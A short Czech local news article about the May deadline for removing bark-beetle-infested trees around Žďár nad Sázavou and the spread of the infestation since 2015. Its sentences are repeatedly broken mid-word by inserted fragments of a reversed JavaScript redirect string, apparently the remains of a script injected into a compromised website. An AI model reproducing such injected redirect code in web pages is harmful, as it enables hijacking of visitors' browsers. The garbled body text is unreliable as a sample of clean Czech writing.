Rainbow page separator

Stromy, do kterých se pustil kůrovec, musí z lesa ven v květnu

Středa, 28. dubna 2021

Žďár nad Sázavou / Nejpozději do konce května musí vlastníci lesů zpracovat dřevo le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos napadené kůrovcem; tedy ještě před výletem první le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní generace škůdce z napadených s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících stromů či ležícího dříví. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kmeny je třeba urychleně mechanicky či chemicky ošetřit, na což upozorňuje odbor životního prostředí žďárského městského úřadu. Důvodem je snaha o zmírnění průběhu kůrovcové kalamity a omezení výše škod.
Stávající vlna kůrovcové kalamity začala extrémním suchem v roce 2015, které nahrálo rychlému množení lýkožrouta smrkového a dalšímu oslabení smrkových porostů. Vhodnější klimatické podmínky co do množství srážek nastaly až v loňském roce, nicméně kalamita se postupně dostala už i do lesů ve vyšších polohách Žďárských vrchů. Majitelé lesních porostů jsou pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opakovaně upozorňováni na nutnost pravidelného prověřování stavu svých lesů a rovněž včasného odstranění či asanaci napadených stromů.